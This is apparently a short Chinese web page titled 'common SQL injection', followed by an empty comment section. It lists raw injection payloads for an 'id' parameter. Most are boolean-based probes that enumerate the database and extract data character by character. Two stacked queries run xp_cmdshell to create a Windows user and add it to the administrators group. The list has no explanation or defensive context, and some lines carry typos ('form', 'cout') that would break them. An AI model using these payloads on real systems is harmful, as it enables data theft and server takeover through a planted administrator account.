id=1 and 1=1
id=1 and 1=2
id=1 and db_name()>0
id=1 and user>0
id=1 and (select count(*) from xx)>0
id=1 and (select cout(xxx) form xx)>0
id=1 and (select top 1 len(xxx) from xx)>0 ->1,2,3......
id=1 and (select top 1 asc(mid(xxx,1,1)) form xx)>0 -> 1-128
id=1;exec master..xp_cmdshell "net user username passwd /add"--
id=1;exec master..xp_cmdshell "net localgroup username administrators /add"--
id=1 and (select top 1 username from sysobjects where xtype=nchar(85) and status>0)>0
id=1 and (select top 1 col_name(object_id('xxx'),1) form sysobjects)>0常見SQL注入
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章